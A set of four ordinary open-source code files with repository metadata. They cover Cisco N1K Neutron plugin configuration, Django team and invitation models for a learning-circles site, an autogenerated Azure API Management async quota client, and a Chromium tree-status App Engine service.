cfg.StrOpt('default_network_profile', default='default_network_profile',
help=_("N1K default network profile")),
cfg.StrOpt('default_policy_profile', default='service_profile',
help=_("N1K default policy profile")),
cfg.StrOpt('network_node_policy_profile', default='dhcp_pp',
help=_("N1K policy profile for network node")),
cfg.IntOpt('poll_duration', default=60,
help=_("N1K Policy profile polling duration in seconds")),
cfg.BoolOpt('restrict_policy_profiles', default=False,
help=_("Restrict the visibility of policy profiles to the "
"tenants")),
cfg.IntOpt('http_pool_size', default=4,
help=_("Number of threads to use to make HTTP requests")),
cfg.IntOpt('http_timeout', default=15,
help=_("N1K http timeout duration in seconds")),
cfg.BoolOpt('restrict_network_profiles', default=False,
help=_("Restrict tenants from accessing network profiles "
"belonging to some other tenant")),
]
cfg.CONF.register_opts(cisco_opts, "CISCO")
cfg.CONF.register_opts(cisco_n1k_opts, "CISCO_N1K")
config.register_root_helper(cfg.CONF)
# shortcuts
CONF = cfg.CONF
CISCO = cfg.CONF.CISCO
CISCO_N1K = cfg.CONF.CISCO_N1K
#
# device_dictionary - Contains all external device configuration.
#
# When populated the device dictionary format is:
# {('<device ID>', '<device ipaddr>', '<keyword>'): '<value>', ...}
#
# Example:
# {('NEXUS_SWITCH', '1.1.1.1', 'username'): 'admin',
# ('NEXUS_SWITCH', '1.1.1.1', 'password'): 'mySecretPassword',
# ('NEXUS_SWITCH', '1.1.1.1', 'compute1'): '1/1', ...}
#
device_dictionary = {}
#
# first_device_ip - IP address of first switch discovered in config
#
# Used for SVI placement when round-robin placement is disabled
#
first_device_ip = None
class CiscoConfigOptions():
"""Cisco Configuration Options Class."""
def __init__(self):
self._create_device_dictionary()
def _create_device_dictionary(self):
"""
        Create the device dictionary from the supported device
        sections in cisco_plugins.ini, e.g. NEXUS_SWITCH, N1KV.
"""
global first_device_ip
multi_parser = cfg.MultiConfigParser()
read_ok = multi_parser.read(CONF.config_file)
if len(read_ok) != len(CONF.config_file):
raise cfg.Error(_("Some config files were not parsed properly"))
first_device_ip = None
for parsed_file in multi_parser.parsed:
for parsed_item in parsed_file.keys():
dev_id, sep, dev_ip = parsed_item.partition(':')
if dev_id.lower() == 'n1kv':
for dev_key, value in parsed_file[parsed_item].items():
if dev_ip and not first_device_ip:
first_device_ip = dev_ip
device_dictionary[dev_id, dev_ip, dev_key] = value[0]
def get_device_dictionary():
return device_dictionary
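# Illustrative read of the populated dictionary (actual values depend on the
# local cisco_plugins.ini):
# CiscoConfigOptions()
# for (dev_id, dev_ip, dev_key), value in get_device_dictionary().items():
#     print '%s %s %s=%s' % (dev_id, dev_ip, dev_key, value)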
|
{
"content_hash": "48e8059c9ade1f6e76f347d77be44332",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 77,
"avg_line_length": 39.08661417322835,
"alnum_prop": 0.6005237711522965,
"repo_name": "samsu/neutron",
"id": "ebc496bd1a3f9c9f9d2605caecac71760161b8a8",
"size": "5576",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "plugins/cisco/common/config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1043"
},
{
"name": "Python",
"bytes": "10579249"
},
{
"name": "Shell",
"bytes": "1535"
}
],
"symlink_target": ""
}
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.db import IntegrityError
from django.conf import settings
from django.urls import reverse
from django.utils.timezone import now
from django_bleach.models import BleachField
from .base import LifeTimeTrackingModel
import uuid
class Team(models.Model):
name = models.CharField(max_length=128)
subtitle = models.CharField(max_length=256, default=_('Join your neighbors to learn something together. Learning circles meet weekly for 6-8 weeks, and are free to join.'))
page_slug = models.SlugField(max_length=256, blank=True)
page_image = models.ImageField(blank=True)
logo = models.ImageField(blank=True)
latitude = models.DecimalField(max_digits=8, decimal_places=6, null=True, blank=True)
longitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
zoom = models.IntegerField(default=7)
created_at = models.DateTimeField(default=now)
email_domain = models.CharField(max_length=128, blank=True)
invitation_token = models.UUIDField(null=True, blank=True, unique=True)
email_address = models.CharField(max_length=128, blank=True)
website = models.URLField(max_length=128, blank=True)
location = models.CharField(max_length=128, blank=True)
intro_text = BleachField(max_length=1000, blank=True, allowed_tags=settings.TINYMCE_DEFAULT_CONFIG.get('valid_elements', '').split(','), allowed_attributes={'a': ['href', 'title', 'rel', 'target']})
membership = models.BooleanField(default=False) # why not call this membership_active?
def __str__(self):
return self.name
def generate_invitation_token(self):
try:
self.invitation_token = uuid.uuid4()
self.save()
except IntegrityError:
            self.generate_invitation_token()
def team_invitation_link(self):
if self.invitation_token is None:
return None
base_url = f'{settings.PROTOCOL}://{settings.DOMAIN}'
path = reverse('studygroups_facilitator_invitation_confirm_token', kwargs={'token': self.invitation_token})
return base_url + path
class TeamMembership(LifeTimeTrackingModel):
ORGANIZER = 'ORGANIZER'
MEMBER = 'MEMBER'
ROLES = (
(ORGANIZER, _('Organizer')),
(MEMBER, _('Member')),
)
team = models.ForeignKey('studygroups.Team', on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
role = models.CharField(max_length=256, choices=ROLES)
weekly_update_opt_in = models.BooleanField(default=True)
def __str__(self):
return 'Team membership: {}'.format(self.user.__str__())
def to_dict(self):
return {
'id': self.user.pk,
'email': self.user.email,
'firstName': self.user.first_name,
'lastName': self.user.last_name
}
class TeamInvitation(models.Model):
""" invittion for users to join a team """
team = models.ForeignKey('studygroups.Team', on_delete=models.CASCADE)
organizer = models.ForeignKey(User, on_delete=models.CASCADE) # organizer who invited the user
email = models.EmailField()
role = models.CharField(max_length=256, choices=TeamMembership.ROLES)
created_at = models.DateTimeField(auto_now_add=True)
responded_at = models.DateTimeField(null=True, blank=True)
joined = models.BooleanField(null=True)
def __str__(self):
return 'Invitation <{} to join {}>'.format(self.email, self.team.name)
def get_study_group_organizers(study_group):
""" Return the organizers for the study group """
team = study_group.team
if team:
organizers = team.teammembership_set.active().filter(role=TeamMembership.ORGANIZER).values('user')
return User.objects.filter(pk__in=organizers)
return []
def get_team_users(user):
""" Return the team members for a user """
# TODO this function doesn't make sense - only applies for logged in users
# change functionality or rename to get_team_mates
team_membership = TeamMembership.objects.active().filter(user=user)
if team_membership.count() == 1:
members = team_membership.first().team.teammembership_set.active().values('user')
return User.objects.filter(pk__in=members)
return []
""" Return the team a user belongs to """
def get_user_team(user):
team_membership = TeamMembership.objects.active().filter(user=user).get()
return team_membership.team
def eligible_team_by_email_domain(user):
# user is already on a team
if TeamMembership.objects.active().filter(user=user).exists():
return None
email_domain = user.email.rsplit('@', 1)[1]
matching_team = Team.objects.filter(email_domain=email_domain).first()
    # user already has an explicit invitation to this team or has already responded to an invitation to this team
if TeamInvitation.objects.filter(email=user.email, team=matching_team).exists():
return None
# team must have an organizer to create invitation
if not TeamMembership.objects.active().filter(team=matching_team, role=TeamMembership.ORGANIZER).exists():
return None
return matching_team
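# A minimal usage sketch (the team name is a placeholder; the link host comes
# from settings.PROTOCOL and settings.DOMAIN as above):
# team = Team.objects.get(name='Example Team')
# team.generate_invitation_token()
# print(team.team_invitation_link())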
|
{
"content_hash": "688cd1aa4778272911d064ed2af9112f",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 202,
"avg_line_length": 38.970588235294116,
"alnum_prop": 0.6920754716981132,
"repo_name": "p2pu/learning-circles",
"id": "491b644dfbab482e724f0874e6cc8a817faa1529",
"size": "5300",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "studygroups/models/team.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6537"
},
{
"name": "Dockerfile",
"bytes": "2110"
},
{
"name": "HTML",
"bytes": "222765"
},
{
"name": "JavaScript",
"bytes": "202138"
},
{
"name": "Python",
"bytes": "859945"
},
{
"name": "SCSS",
"bytes": "122949"
},
{
"name": "Shell",
"bytes": "808"
}
],
"symlink_target": ""
}
|
import sys
from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._quota_by_period_keys_operations import build_get_request, build_update_request
from .._vendor import ApiManagementClientMixinABC
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class QuotaByPeriodKeysOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.apimanagement.aio.ApiManagementClient`'s
:attr:`quota_by_period_keys` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def get(
self, resource_group_name: str, service_name: str, quota_counter_key: str, quota_period_key: str, **kwargs: Any
) -> _models.QuotaCounterContract:
"""Gets the value of the quota counter associated with the counter-key in the policy for the
specific period in service instance.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param service_name: The name of the API Management service. Required.
:type service_name: str
:param quota_counter_key: Quota counter key identifier.This is the result of expression defined
in counter-key attribute of the quota-by-key policy.For Example, if you specify
counter-key="boo" in the policy, then it’s accessible by "boo" counter key. But if it’s defined
as counter-key="@("b"+"a")" then it will be accessible by "ba" key. Required.
:type quota_counter_key: str
:param quota_period_key: Quota period key identifier. Required.
:type quota_period_key: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: QuotaCounterContract or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.QuotaCounterContract
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
) # type: Literal["2021-08-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.QuotaCounterContract]
request = build_get_request(
resource_group_name=resource_group_name,
service_name=service_name,
quota_counter_key=quota_counter_key,
quota_period_key=quota_period_key,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("QuotaCounterContract", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/quotas/{quotaCounterKey}/periods/{quotaPeriodKey}"} # type: ignore
@overload
async def update(
self,
resource_group_name: str,
service_name: str,
quota_counter_key: str,
quota_period_key: str,
parameters: _models.QuotaCounterValueUpdateContract,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.QuotaCounterContract:
"""Updates an existing quota counter value in the specified service instance.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param service_name: The name of the API Management service. Required.
:type service_name: str
:param quota_counter_key: Quota counter key identifier.This is the result of expression defined
in counter-key attribute of the quota-by-key policy.For Example, if you specify
counter-key="boo" in the policy, then it’s accessible by "boo" counter key. But if it’s defined
as counter-key="@("b"+"a")" then it will be accessible by "ba" key. Required.
:type quota_counter_key: str
:param quota_period_key: Quota period key identifier. Required.
:type quota_period_key: str
:param parameters: The value of the Quota counter to be applied on the specified period.
Required.
:type parameters: ~azure.mgmt.apimanagement.models.QuotaCounterValueUpdateContract
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: QuotaCounterContract or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.QuotaCounterContract
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def update(
self,
resource_group_name: str,
service_name: str,
quota_counter_key: str,
quota_period_key: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.QuotaCounterContract:
"""Updates an existing quota counter value in the specified service instance.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param service_name: The name of the API Management service. Required.
:type service_name: str
:param quota_counter_key: Quota counter key identifier.This is the result of expression defined
in counter-key attribute of the quota-by-key policy.For Example, if you specify
counter-key="boo" in the policy, then it’s accessible by "boo" counter key. But if it’s defined
as counter-key="@("b"+"a")" then it will be accessible by "ba" key. Required.
:type quota_counter_key: str
:param quota_period_key: Quota period key identifier. Required.
:type quota_period_key: str
:param parameters: The value of the Quota counter to be applied on the specified period.
Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: QuotaCounterContract or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.QuotaCounterContract
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def update(
self,
resource_group_name: str,
service_name: str,
quota_counter_key: str,
quota_period_key: str,
parameters: Union[_models.QuotaCounterValueUpdateContract, IO],
**kwargs: Any
) -> _models.QuotaCounterContract:
"""Updates an existing quota counter value in the specified service instance.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param service_name: The name of the API Management service. Required.
:type service_name: str
:param quota_counter_key: Quota counter key identifier.This is the result of expression defined
in counter-key attribute of the quota-by-key policy.For Example, if you specify
counter-key="boo" in the policy, then it’s accessible by "boo" counter key. But if it’s defined
as counter-key="@("b"+"a")" then it will be accessible by "ba" key. Required.
:type quota_counter_key: str
:param quota_period_key: Quota period key identifier. Required.
:type quota_period_key: str
:param parameters: The value of the Quota counter to be applied on the specified period. Is
either a model type or a IO type. Required.
:type parameters: ~azure.mgmt.apimanagement.models.QuotaCounterValueUpdateContract or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: QuotaCounterContract or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.QuotaCounterContract
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
) # type: Literal["2021-08-01"]
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[_models.QuotaCounterContract]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "QuotaCounterValueUpdateContract")
request = build_update_request(
resource_group_name=resource_group_name,
service_name=service_name,
quota_counter_key=quota_counter_key,
quota_period_key=quota_period_key,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.update.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("QuotaCounterContract", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/quotas/{quotaCounterKey}/periods/{quotaPeriodKey}"} # type: ignore
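# ----------------------------------------------------------------------------
# Minimal usage sketch (not part of the generated client; values in angle
# brackets are placeholders, and DefaultAzureCredential is one of several
# valid credential types):
#
#     from azure.identity.aio import DefaultAzureCredential
#     from azure.mgmt.apimanagement.aio import ApiManagementClient
#
#     async def show_counter():
#         async with ApiManagementClient(
#             DefaultAzureCredential(), "<subscription-id>"
#         ) as client:
#             contract = await client.quota_by_period_keys.get(
#                 resource_group_name="<resource-group>",
#                 service_name="<service-name>",
#                 quota_counter_key="<counter-key>",
#                 quota_period_key="<period-key>",
#             )
#             print(contract.counter_key)
# ----------------------------------------------------------------------------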
|
{
"content_hash": "2c56732a4518f28d92ff5b5d6ea35a1a",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 221,
"avg_line_length": 47.10958904109589,
"alnum_prop": 0.6653096830473975,
"repo_name": "Azure/azure-sdk-for-python",
"id": "8ea0b5c93bdab6c90920c8baff44e300053ab6ba",
"size": "14272",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/aio/operations/_quota_by_period_keys_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
"""Status management pages."""
import datetime
import json
import re
from google.appengine.api import memcache
from google.appengine.ext import db
from appengine_module.chromium_status.base_page import BasePage
from appengine_module.chromium_status import utils
ALLOWED_ORIGINS = [
'https://gerrit-int.chromium.org',
'https://gerrit.chromium.org',
'https://chrome-internal-review.googlesource.com',
'https://chromium-review.googlesource.com',
]
class TextFragment(object):
"""Simple object to hold text that might be linked"""
def __init__(self, text, target=None, is_email=False):
self.text = text
self.target = target
self.is_email = is_email
def __repr__(self):
return 'TextFragment({%s->%s})' % (self.text, self.target)
class LinkableText(object):
"""Turns arbitrary text into a set of links"""
GERRIT_URLS = {
'chrome': 'https://chrome-internal-review.googlesource.com',
'chromium': 'https://chromium-review.googlesource.com',
}
WATERFALL_URLS = {
'chromeos': 'https://uberchromegw.corp.google.com/i/chromeos',
'chromiumos': 'http://build.chromium.org/p/chromiumos',
}
APP_PREFIXES = (
'dev~',
's~',
)
# Automatically linkify known strings for the user.
_CONVERTS = []
@classmethod
def register_converter(cls, regex, target, pretty, is_email, flags=re.I):
"""Register a new conversion for creating links from text"""
cls._CONVERTS.append(
(re.compile(regex, flags=flags), target, pretty, is_email))
@classmethod
def bootstrap(cls, is_chromiumos):
"""Add conversions (possibly specific to |app_name| instance)"""
# Convert CrOS bug links. Support the forms:
# http://crbug.com/1234
# http://crosbug.com/1234
# crbug/1234
# crosbug/p/1234
cls.register_converter(
# 1 2 3 4 5 6 7
r'\b((http://)?((crbug|crosbug)(\.com)?(/(p/)?[0-9]+)))\b',
r'http://\4.com\6', r'\1', False)
# Convert internal b/ bug links.
cls.register_converter(
r'\b(http://)?(b/([0-9]+))\b',
r'https://b.corp.google.com/\3', r'\2', False)
# Convert e-mail addresses.
cls.register_converter(
r'(([-+.a-z0-9_!#$%&*/=?^_`{|}~]+)@[-a-z0-9.]+\.[a-z0-9]+)\b',
r'\1', r'\2', True)
# Convert SHA1's to gerrit links. Assume all external since
# there is no sane way to detect it's an internal CL.
cls.register_converter(
r'\b([0-9a-f]{40})\b',
r'%s/#q,\1,n,z' % cls.GERRIT_URLS['chromium'], r'\1', False)
# Convert public gerrit CL numbers which take the form:
# CL:1234
cls.register_converter(
r'\b(CL[: ]([0-9]+))\b',
r'%s/\2' % cls.GERRIT_URLS['chromium'], r'\1', False)
# Convert internal gerrit CL numbers which take the form:
# CL:*1234
cls.register_converter(
r'\b(CL[: ]\*([0-9]+))\b',
r'%s/\2' % cls.GERRIT_URLS['chrome'], r'\1', False)
# Match the string:
# Automatic: "cbuildbot" on "x86-generic ASAN" from.
# Do this for everyone since "cbuildbot" is unique to CrOS.
# Otherwise, we'd do it only for chromium |app_name| instances.
cls.register_converter(
r'("cbuildbot" on "([^"]+ (canary|master|launcher))")',
r'%s/builders/\2' % cls.WATERFALL_URLS['chromeos'], r'\1', False)
cls.register_converter(
r'("cbuildbot" on "([^"]+)")',
r'%s/builders/\2' % cls.WATERFALL_URLS['chromiumos'], r'\1', False)
if is_chromiumos:
# Match the string '"builder name"-internal/public-buildnumber:'. E.g.,
# "Canary master"-i-120:
# This applies only to the CrOS instance where the builders may update
# the tree status directly.
cls.register_converter(
r'("([\w\s]+)"-i-(\d+):)',
r'%s/builders/\2/builds/\3' % cls.WATERFALL_URLS['chromeos'],
r'\1', False
)
cls.register_converter(
r'("([\w\s]+)"-p-(\d+):)',
r'%s/builders/\2/builds/\3' % cls.WATERFALL_URLS['chromiumos'],
r'\1', False
)
@classmethod
def parse(cls, text):
"""Creates a list of TextFragment objects based on |text|"""
if not text:
return []
for prog, target, pretty_text, is_email in cls._CONVERTS:
m = prog.search(text)
if m:
link = TextFragment(m.expand(pretty_text),
target=m.expand(target),
is_email=is_email)
left_links = cls.parse(text[:m.start()].rstrip())
right_links = cls.parse(text[m.end():].lstrip())
return left_links + [link] + right_links
return [TextFragment(text)]
def __init__(self, text):
self.raw_text = text
self.links = self.parse(text.strip())
def __str__(self):
return self.raw_text
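# Quick illustration of the parsing above (assumes bootstrap() has already
# registered the converters; prints fragment -> link target):
# LinkableText.bootstrap(False)
# lt = LinkableText('Tree closed for crbug/1234, ping dev@example.com')
# for frag in lt.links:
#   print '%s -> %s' % (frag.text, frag.target)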
class Status(db.Model):
"""Description for the status table."""
# The username who added this status.
username = db.StringProperty(required=True)
# The date when the status got added.
date = db.DateTimeProperty(auto_now_add=True)
# The message. It can contain html code.
message = db.StringProperty(required=True)
def __init__(self, *args, **kwargs):
    # Normalize newlines, otherwise the DB store barfs. We don't really want
    # this field to handle newlines: none of the places where we output the
    # content are designed for them, and neither are the clients that consume us.
kwargs['message'] = kwargs.get('message', '').replace('\n', ' ')
super(Status, self).__init__(*args, **kwargs)
@property
def username_links(self):
return LinkableText(self.username)
@property
def message_links(self):
return LinkableText(self.message)
@property
def general_state(self):
"""Returns a string representing the state that the status message
describes.
Note: Keep in sync with main.html help text.
"""
message = self.message
closed = re.search('close', message, re.IGNORECASE)
if closed and re.search('maint', message, re.IGNORECASE):
return 'maintenance'
if re.search('throt', message, re.IGNORECASE):
return 'throttled'
if closed:
return 'closed'
return 'open'
@property
def can_commit_freely(self):
return self.general_state == 'open'
def AsDict(self):
data = super(Status, self).AsDict()
data['general_state'] = self.general_state
data['can_commit_freely'] = self.can_commit_freely
return data
def get_status():
"""Returns the current Status, e.g. the most recent one."""
status = memcache.get('last_status')
if status is None:
status = Status.all().order('-date').get()
# Use add instead of set(); must not change it if it was already set.
memcache.add('last_status', status)
return status
def put_status(status):
"""Sets the current Status, e.g. append a new one."""
status.put()
memcache.set('last_status', status)
memcache.delete('last_statuses')
def get_last_statuses(limit):
"""Returns the last |limit| statuses."""
statuses = memcache.get('last_statuses')
if not statuses or len(statuses) < limit:
statuses = Status.all().order('-date').fetch(limit)
memcache.add('last_statuses', statuses)
return statuses[:limit]
def parse_date(date):
"""Parses a date."""
match = re.match(r'^(\d\d\d\d)-(\d\d)-(\d\d)$', date)
if match:
return datetime.datetime(
int(match.group(1)), int(match.group(2)), int(match.group(3)))
if date.isdigit():
return datetime.datetime.utcfromtimestamp(int(date))
return None
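# e.g. parse_date('2014-05-01')  -> datetime.datetime(2014, 5, 1, 0, 0)
#      parse_date('1398902400')  -> the same instant, from a Unix timestamp
#      parse_date('yesterday')   -> None (unrecognized format)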
def limit_length(string, length):
"""Limits the string |string| at length |length|.
Inserts an ellipsis if it is cut.
"""
string = unicode(string.strip())
if len(string) > length:
string = string[:length - 1] + u'…'
return string
class AllStatusPage(BasePage):
"""Displays a big chunk, 1500, status values."""
@utils.requires_read_access
def get(self):
query = db.Query(Status).order('-date')
start_date = self.request.get('startTime')
if start_date:
query.filter('date <', parse_date(start_date))
try:
limit = int(self.request.get('limit'))
except ValueError:
limit = 1000
end_date = self.request.get('endTime')
beyond_end_of_range_status = None
if end_date:
query.filter('date >=', parse_date(end_date))
# We also need to get the very next status in the range, otherwise
# the caller can't tell what the effective tree status was at time
# |end_date|.
beyond_end_of_range_status = Status.all(
).filter('date <', end_date).order('-date').get()
out_format = self.request.get('format', 'csv')
if out_format == 'csv':
# It's not really an html page.
self.response.headers['Content-Type'] = 'text/plain'
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
template_values['status'] = query.fetch(limit)
template_values['beyond_end_of_range_status'] = beyond_end_of_range_status
self.DisplayTemplate('allstatus.html', template_values)
elif out_format == 'json':
self.response.headers['Content-Type'] = 'application/json'
self.response.headers['Access-Control-Allow-Origin'] = '*'
statuses = [s.AsDict() for s in query.fetch(limit)]
if beyond_end_of_range_status:
statuses.append(beyond_end_of_range_status.AsDict())
data = json.dumps(statuses)
callback = self.request.get('callback')
if callback:
if re.match(r'^[a-zA-Z$_][a-zA-Z$0-9._]*$', callback):
data = '%s(%s);' % (callback, data)
self.response.out.write(data)
else:
self.response.headers['Content-Type'] = 'text/plain'
self.response.out.write('Invalid format')
class CurrentPage(BasePage):
"""Displays the /current page."""
def get(self):
# Show login link on current status bar when login is required.
out_format = self.request.get('format', 'html')
if out_format == 'html' and not self.read_access and not self.user:
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
template_values['show_login'] = True
self.DisplayTemplate('current.html', template_values, use_cache=True)
else:
self._handle()
@utils.requires_bot_login
def post(self):
"""Handles the same get request from a backdoor.
POST to receive the password plaintext without polluting the logs.
"""
return self._handle()
@utils.requires_read_access
def _handle(self):
"""Displays the current message in various formats."""
out_format = self.request.get('format', 'html')
status = get_status()
if out_format == 'raw':
self.response.headers['Content-Type'] = 'text/plain'
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.out.write(status.message)
elif out_format == 'json':
self.response.headers['Content-Type'] = 'application/json'
origin = self.request.headers.get('Origin')
if self.request.get('with_credentials') and origin in ALLOWED_ORIGINS:
self.response.headers['Access-Control-Allow-Origin'] = origin
self.response.headers['Access-Control-Allow-Credentials'] = 'true'
else:
self.response.headers['Access-Control-Allow-Origin'] = '*'
data = json.dumps(status.AsDict())
callback = self.request.get('callback')
if callback:
if re.match(r'^[a-zA-Z$_][a-zA-Z$0-9._]*$', callback):
data = '%s(%s);' % (callback, data)
self.response.out.write(data)
elif out_format == 'html':
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
template_values['show_login'] = False
template_values['message'] = status.message
template_values['state'] = status.general_state
self.DisplayTemplate('current.html', template_values, use_cache=True)
else:
self.error(400)
class StatusPage(BasePage):
"""Displays the /status page."""
def get(self):
"""Displays 1 if the tree is open, and 0 if the tree is closed."""
# NOTE: This item is always public to allow waterfalls to check it.
status = get_status()
self.response.headers['Cache-Control'] = 'no-cache, private, max-age=0'
self.response.headers['Content-Type'] = 'text/plain'
self.response.out.write(str(int(status.can_commit_freely)))
@utils.requires_bot_login
@utils.requires_write_access
def post(self):
"""Adds a new message from a backdoor.
The main difference with MainPage.post() is that it doesn't look for
conflicts and doesn't redirect to /.
"""
# TODO(tandrii): switch to using service accounts.
message = self.request.get('message')
message = limit_length(message, 500)
username = self.request.get('username')
if message and username:
put_status(Status(message=message, username=username))
self.response.out.write('OK')
class StatusViewerPage(BasePage):
"""Displays the /status_viewer page."""
@utils.requires_read_access
def get(self):
"""Displays status_viewer.html template."""
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
self.DisplayTemplate('status_viewer.html', template_values)
class MainPage(BasePage):
"""Displays the main page containing the last 25 messages."""
# NOTE: This is require_login in order to ensure that authentication doesn't
# happen while changing the tree status.
@utils.requires_login
@utils.requires_read_access
def get(self):
return self._handle()
def _handle(self, error_message='', last_message=''):
"""Sets the information to be displayed on the main page."""
try:
limit = min(max(int(self.request.get('limit')), 1), 1000)
except ValueError:
limit = 25
status = get_last_statuses(limit)
current_status = get_status()
if not last_message:
last_message = current_status.message
template_values = self.InitializeTemplate(self.APP_NAME + ' Tree Status')
template_values['status'] = status
template_values['message'] = last_message
template_values['last_status_key'] = current_status.key()
template_values['error_message'] = error_message
template_values['limit'] = limit
self.DisplayTemplate('main.html', template_values)
